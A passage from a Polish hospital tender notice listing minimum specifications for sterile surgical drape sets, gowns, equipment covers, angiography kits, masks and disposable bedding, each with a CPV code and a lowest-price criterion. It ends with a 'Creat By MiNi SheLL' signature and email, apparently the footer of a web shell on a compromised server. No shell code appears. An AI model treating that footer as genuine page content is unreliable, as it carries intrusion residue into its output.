1 szt. serweta okulistyczna o min. wym. 170 cm x 260 cm z oknem 12 x 10 cm wypełnionym folią chirurgiczną z wycięciem na oko 6,5 x 4 cm i workiem do gromadzenia płynów - usztywnione metalowymi wkładkami brzegi worka można formować .
1 szt. serweta do nakrycia stołu instrumentariuszki o min. wym.140 cm  x 190 cm. owinięcie zestawu
4	Zestaw serwet jałowych  do chirurgii biodra z dodatkowymi wstawkami chłonnymi 
Minimalny skład zestawu:
1 szt.  serweta samoprzylepna o min. wym. 170 x 300 cm 
1 szt. serweta samoprzylepna z wycięciem U o min. wym. 260 x 200 cm,   wycięcie U o min. wym. 6,5 x 90 cm  z dodatkowym elementem chłonnym o min. wym. 160 x 150 cm 
1 szt.  serweta  o min. wym. 150 cm  x 150 cm  
1 szt.  serweta  o min. wym. 75 cm  x 90 cm 
osłona na kończynę w formie worka - wym. min 30x80cm
1 szt.  obłożenie na stolik MAYO o wym. min. 80 x 140 cm  w formie worka złożonego teleskopowo.
1 szt.  serweta na stolik narzędziowy o wym. min. 140 x 190 cm owinięcie zestawu
2 szt.  taśma samoprzylepna 10 x 50 cm i ręczniki celulozowe
5	Zestaw serwet jałowych do zabiegów na kończynie dolnej (artroskopia, endoproteza kolana) z dodatkowymi wstawkami chłonnymi 
Minimalny skład zestawu: 
1 szt. serweta o wym. min. 200 x 320 cm z otworem samouszczelniającym się o wym. min. 5 x 7 cm  z dodatkowym elementem chłonnym o min. wym. 150 x 100 cm. oraz umocowanym na serwecie uchwytem  taśmą typu rzep do mocowania kabli drenów
1 szt.  osłona na kończynę w formie worka - wym. min. 25 x 80 cm 
1 szt. obłożenie na stolik Mayo  o wym. minimum 80 x 140 cm składane teleskopowo 
1 szt.  serweta operacyjna o wym. min. 150 x 150 cm
1 szt. serweta o wym. min.  140 x 190 cm -  na stolik  narzędziowy  owinięcie zestawu 
taśmy samoprzylepne 10 x 50 cm i ręczniki celulozowe
6	Zestaw serwet jałowych do operacji ręki. 
Minimalny skład zestawu:
1 szt. serweta o wym. min. 320 x 270 cm z samouszczelniającym się otworem o śr. 3-3,5 cm, z dodatkowym elementem chłonnym w okolicy pola operacyjnego o wym. min. 50 x 100 cm
1 szt. serweta min. wym. 100 x 150 cm 
1 szt  serweta na stolik narzędziowy o wym. min. 140 x 190 cm  owinięcie zestawu
1 szt. uchwyt typu rzep o min. wym. 2 x 20 cm  
Zestaw wykonany z min. 2 warstw folia polietylenowa + włóknina o min. gramaturze 54 g/m2 na całej powierzchni +elementy chłonne o minimalnej gramaturze 110 g/m2
7	Zestaw serwet jałowych do chirurgii barku 
Minimalny skład zestawu:
1 szt. serweta samoprzylepna z wycięciem U o min. wym . serwety 200 x 260 cm, -   wycięciem Uo min. wym.  6,5 x 60 cm
1 szt. osłona na kończynę o min. wym. 25 x 80 cm 
1 szt. serweta operacyjna o min. wym. 150  x 175 cm
1 szt. obłożenie stolika Mayo o min. wym. 80  x 140 cm 
1 szt. serweta samoprzylepna o min wym.  150 cm  x 240 cm  
1 szt. serweta do nakrycia stołu instrumentariuszki o min . wym. 140 x 190 cm (owinięcie zestawu)
2 szt. taśmy samoprzylepne o min. wym 10  x 50 cm  i   ręczniki celulozowe
8	Zestaw serwet do ułożenia ginekologicznego (urologia, proktologia ) w skład którego wchodzi : 
-1 szt. Serweta w ułożeniu ginekologicznym min. 290x250 cm z samoprzylepnym otworem w kroczu o wymiarze 9x12 cm i dodatkowym obszarem wzmocnionym 
-1 szt. Serweta 75x90 cm 
-1 szt. Obłożenie na stolik Mayo min. 80x140 cm w formie worka złożony teleskopowo, ręczniki celulozowe 
-1 szt. Serweta na stolik narzędziowy min. 140x190 cm jako owinięcie zestawu
-taśma samoprzylepna 10x50 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sterylne osłony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Jałowe obłożenie stolika Mayo w kształcie worka wykonane z  warstwy  chłonnej włókniny oraz  folii PE o wymiarze min.  80 x 140 cm,  składane teleskopowo Materiał serwety musi spełniać wymogi normy EN 13795 -1 - 3
- Jałowa osłona na kończynę wykonana z trójwarstwowej 
laminowanej włókniny o wymiarach min. 35 x 120 cm 
Materiał serwety musi spełniać wymogi normy EN 13795 -1 - 3
- Jałowa osłona na stopę wykonana z trójwarstwowej laminowanej włókniny o wymiarach min. 40 x 22 x 8 cm Materiał serwety musi spełniać wymogi normy EN 13795-1-3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sterylna bielizna operacyjna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fartuch chirurgiczny, jałowy, jednorazowego użytku, pełno barierowy, posiadający dodatkowe nieprzemakalne wzmocnienia w części przedniej i w rękawach. 
Rękaw zakończony elastycznym mankietem z dzianiny. Tylne części fartucha zachodzą na siebie, wiązany na troki umocowane w specjalnym kartoniku  umożliwiającym zawiązanie ich zgodnie z procedurami
 postępowania aseptycznego  i z zachowaniem pełnej sterylności tylnej części fartucha.
Materiał o gramaturze minimum 35g/m2, wzmocnienia o gramaturze min. 38 g/m2. Rozmiar -  M-XXL. Fartuch zgodny z normą EN 13795-1-3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sterylne pokrowce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Sterylna osłona na ramię C aparatu rtg 
składająca się z: 
2 szt. przezroczysta osłona wykonana z folii PE o grubości minimum 0,05 mm, ściągnięta gumką o średnicy 80 cm.
1 szt. osłona na ramię ruchome o wymiarach min
       50 x 250 cm. Wyposażona na całej długości        w taśmy lepne pozwalające na prawidłowe        mocowanie pracującego ramienia
- Sterylna osłona na przewody ( Tubus ) - wykonana z folii PE o dużej wytrzymałości mechanicznej na rozerwanie z taśmą do mocowania na końcach. Rozmiar minimum 16 x 200 cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Sterylne taśmy i uchwyty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Sterylna taśma samoprzylepna jednorazowego użytku do mocowania serwet wielorazowych barierowych o wymiarze  10 cm x 50 cm

- Sterylny uchwyt typu rzep o wymiarach minimalnych 2 cmx 23cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Sterylne obłożenia do arteriografii i endowaskularnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obłożenia do arteriografii i zabiegów endowaskularnych:
- z otworami umożliwiającymi dostęp do obu pachwin
- otwory dodatkowo otoczone taśmą samoprzylepną
-z folią przezroczystą osłaniającą panel sterowania
- z dwoma fartuchami
- z dwoma miseczkami na kontrast
- z dodatkowym obłożeniem na kończyny dolne
- z folią osłaniającą lampę
- z gąbką do umycia i dezynfekcji podłoża skóry.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Jednorazowy sterylny zestaw do zabiegów angiograficznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serweta angiograficzna  wykonana z włókniny trójwarstwowej  o wymiarach minimum 230 x 300,  o gramaturze minimum 50 g/m2, odporność na penetracje płynów, z przezroczystą foliową wstawką o wymiarach minimum  70x200 cm do zabezpieczenia pulpitu sterowniczego. Serweta z dwoma  otworami w okolicach tętnic  udowych minimum (O 8,5 cm) otoczone taśmą samoprzylepną, oraz dwoma  otworami w okolicach tętnic promieniowych o wymiarach minimum 6x12 cm otoczone taśmą samoprzylepną. Otwory otoczone warstwą chłonną o wymiarach minimum  75x150 cm -1 sztuka
Sterylny fartuch chirurgiczny wykonany w całości z trójwarstwowej włókniny o gramaturze minimum  35 g/m2 i nieprzemakalności 35cm H2O, rękawy zakończone elastycznym mankietem wykonanym z włókien syntetycznych. Zapinany przy szyi na rzep, troki mają być łączone kartonikiem, rozmiar XL - 1 sztuka
Miseczka plastikowa o pojemności od 250-500 ml- 1 sztuka
Osłona na lampę RTG, typu czapeczka o wymiarach min 75/140 cm wykonana z folii PE o grubości minimum 25 mikronów- 3 szt
Ręczniki białe o wymiarach minimum 30x40 cm- 4 sztuki
Gaziki 7, 5 cm x7, 5 cm, 12 warstwowe, 17 TH- 50 sztuk
Ostrze z rączką(skalpel) SIZE 11 - 1 szt
Serwetka do spakowania zestawu - na stolik zabiegowy o wymiarach minimum 150x180 cm- 1 sztuka
Kleszczyki typu pean - 1 sztuka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Bielizna operacyjna - odzież ochronna niesterylna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Maseczka chirurgiczna jednorazowego użytku wykonana z bezwonnej włókniny trójwarstwowej (gdzie środkową warstwę stanowi filtr o wysokiej efektywności filtracji) z trokami do wiązania i kształtką na nos. Maseczka zgodna z normą PN-EN 14683 i określona w klasie II. Maseczki pakowane w kartoniki maksimum 50 szt. umożliwiające ich higieniczne przechowywanie.       
- Czepek uniwersalny typu furażerka jednorazowego użytku wykonany w całości z pochłaniającej pot włókniny wiskozowej o gramaturze 25g/m2 , w części tylnej ściągacz. Pakowany w kartonik maksimum 50 - 100 szt.
- Czepek uniwersalny  typu beret jednorazowego użytku wykonany z włókniny polipropylenowej o gramaturze 14g/m2. ściągany dookoła elastyczną taśmą. Pakowany w karton maksimum 50 - 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Serweta niesterylna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serweta niesterylna  z włókniny trójwarstwowej  typ SMS o gramaturze włókniny minimum 45g/m2, nieprzezroczysta o dużej wytrzymałości na rozerwanie (służąca do przykrycia stołu i pacjenta transportowanego w obrębie bloku operacyjnego) Rozmiar: minimum 160 x 210 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Fartuch higieniczny niesterylny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fartuch higieniczny, niesterylny z włókniny polipropylenowej w kolorze niebieskim, wiązany z tyłu na troki, rękawy ściągane mankietem lub gumką rozmiar uniwersalny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Niesterylne fartuchy foliowe, rękawice, ochraniacze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Fartuch ochronny foliowy jednorazowego użytku w rozmiarze XXL
- Jednorazowe higieniczne ochraniacze na obuwie wykonane w włókniny polipropylenowej lub folii
- Folia operacyjna obłożeniowa, niesterylna, nieprzylepna, z PCV, rozm. min 100 cm x120cm,
 do zabiegów urologicznych z miejscem na palce i otworem na penisa.

- Rękawice foliowe jednorazowego użytku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Bielizna pościelowa niesterylna - jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Poszwa nie sterylna jednorazowego użytku o rozmiarach 160cmx210cm
- Poszewka nie sterylna na poduszkę jednorazowego użytku o rozmiarach 70cmx80cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Prześcieradło na rolce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Podkład papierowy dwuwarstwowy jednorazowy w rolce o wym. min 60-70cm x 80m
- Podkład papierowo-foliowy na rolce o wym. Szer. 40-50cm, długość 40m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Podkład chłonny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podkład higieniczny z miekką warstwą chłonną wykonaną z pulpy celulozowej o wymiarach 60 cm x 90 cm. Do stosowania jako dodatkowe zabezpieczenie łózka chorego zanieczyszczającego się. Warstwa przylegająca do skóry chorego powinna być miękka, o dużej absorpcji płynów, zapewniać komfort choremu, nie może powodować odczynów alergicznych na skórze. Od spodu warstwa nieprzemakalna antypoślizgowa, powinna zapobiegać przesuwaniu się podkładu na bieliźnie pościelowej i stanowić ochronę przed zawilgoceniem pościeli.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Termoizolacyjny koc ratunkowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termoizolacyjny koc ratunkowy (folia życia) wykonany z folii poliestrowej metalizowanej (jedna strona srebrna a druga złota), umożliwiająca ochronę przed zimnem i przed gorącym / przeciwwstrząsowa o wymiarach około 210 cm x 160 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com